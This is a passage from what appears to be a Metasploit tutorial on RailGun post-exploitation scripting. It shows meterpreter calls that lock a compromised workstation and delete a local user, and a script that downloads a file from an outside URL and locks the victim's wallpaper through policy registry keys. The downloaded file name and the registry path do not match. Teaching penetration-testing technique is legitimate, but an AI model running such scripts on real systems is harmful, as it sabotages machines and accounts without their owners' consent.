Interactive Ruby shell basics

RailGun requires the irb shell to be loaded into meterpreter. Let's look at how we can jump to the irb shell from meterpreter:

We can see in the preceding screenshot that simply typing in irb from meterpreter drops us into the Ruby-interactive shell. We can perform a variety of tasks with the Ruby shell and can execute any Linux command from here.

Understanding RailGun and its scripting

RailGun gives us immense power to perform tasks that Metasploit can not perform. We can raise exceptions to any DLL file from the breached system and create some more advanced post-exploitation mechanisms.

Now, let's see how we can call a function using basic API calls with RailGun and understand how it works:

client.railgun.DLLname.function(parameters)

This is the basic structure of an API call in RailGun. The client.railgun keyword defines that we need the functionality of RailGun for the client. The DLLname keyword specifies the name of the DLL file for making a call. The function (parameters) keyword in the syntax specifies the actual API function that is to be provoked with required parameters from the DLL file.

Let's see an example:

The result of this API call is as follows:

Here, a call is made to the LockWorkStation() function from the user32.dll DLL file that resulted in the locking of the compromised system.

Next, let's see an API call with parameters:

client.railgun.netapi32.NetUserDel(arg1,agr2)

When the preceding command runs, it deletes a particular user from the client's machine. Let's try deleting the sss username:

Let's check whether the user is successfully removed or not:

Oops! The user seems to have gone fishing. RailGun is really an awesome tool, and it has removed the user sss successfully. Before proceeding further, let's get to know what the value nil in the parameters was. The nil value defined that the user is in the local network. However, if the system had been a remote one, we would have passed the system's NET-BIOS name in the parameter.

Manipulating Windows API calls

DLL files are responsible for carrying out the majority of tasks. Therefore, it is important to understand which DLL file contains which method. Simple alert boxes are generated too by calling the appropriate method from the correct DLL file. It is very similar to the library files of Metasploit, which have various methods in them. To study Windows API calls, we have good resources at http://source.winehq.org/WineAPI/ and http://msdn.microsoft.com/en-us/library/windows/desktop/ff818516(v=vs.85).aspx. I recommend you study a variety of API calls before proceeding further with creating RailGun scripts.

Fabricating sophisticated RailGun scripts

Taking a step further, let's delve deeper into writing scripts using RailGun for meterpreter extensions. Let's first create a script which will add a custom-named DLL file to the Metasploit context:

if client.railgun.get_dll('urlmon') == nil
print_status("Adding Function")
end
client.railgun.add_dll('urlmon','C:\\WINDOWS\\system32\\urlmon.dll')
client.railgun.add_function('urlmon','URLDownloadToFileA','DWORD',[
["DWORD","pcaller","in"],
["PCHAR","szURL","in"],
["PCHAR","szFileName","in"],
["DWORD","Reserved","in"],
["DWORD","lpfnCB","in"],
])

Save the code under a file named urlmon.rb under the /scripts/meterpreter directory.

The preceding script adds a reference path to the C:\\WINDOWS\\system32\\urlmon.dll file that contains all the required functions for browsing a URL and other functions such as downloading a particular file. We save this reference path under the name urlmon. Next, we add a custom function to the DLL file using the DLL file's name as the first parameter and the name of the function we are going to create as the second parameter, which is URLDownloadToFileA followed by the required parameters. The very first line of the code checks whether the DLL function is already present in the DLL file or not. If it is already present, the script will skip adding the function again. The pcaller parameter is set to NULL if the calling application is not an ActiveX component; if it is, it is set to the COM object. The szURL parameter specifies the URL to download. The szFileName parameter specifies the filename of the downloaded object from the URL. Reserved is always set to NULL, and lpfnCB handles the status of the download. However, if the status is not required, this value should be set to NULL.

Let's now create another script which will make use of this function. We will create a post-exploitation script that will permanently fix the specified wallpaper on the target system. We will make use of the registry to modify the settings of the wallpaper. Let's see how we can do this.

We create another script in the same directory and name it myscript.rb as follows:

client.railgun.urlmon.URLDownloadToFileA(0,"h ttp://usaherald.com/wp-content/uploads/2013/05/A2.jpg","C:\\haxd.jpg",0,0)
key="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"
syskey=registry_createkey(key)
print_line("System Key Created")
wall=registry_setvaldata(key,'Wallpaper','C:\rock.jpg','REG_SZ')
print_line("Creating Values For Wallpaper")
wallsty=registry_setvaldata(key,'WallpaperStyle','2','REG_SZ')
print_line("Creating Wallpaper Style Profile")

As stated previously, the first line of the script will call the custom-added DLL function URLDownloadToFile from the urlmon DLL file with the required parameters. Next, we create a directory under the POLICIES directory in the registry named SYSTEM. Then, we create two registry values of the type REG_SZ named Wallpaper and WallpaperStyle. We assign the downloaded wallpaper to the value of the Wallpaper registry key and WallpaperStyle to 2, which makes the wallpaper stretch and fit the entire screen.

Let's run this script from meterpreter to see how things actually work:

As soon as we run the myscipt.rb script, the registry settings are modified on the target system:

Moreover, at the next logon, the user's wallpaper is changed, and they are not able to change it back again, as shown in the following screenshot:

You can clearly see the power of RailGun, which eases the process of creating a path to whichever DLL file you want and allows you to add custom functions to it as well.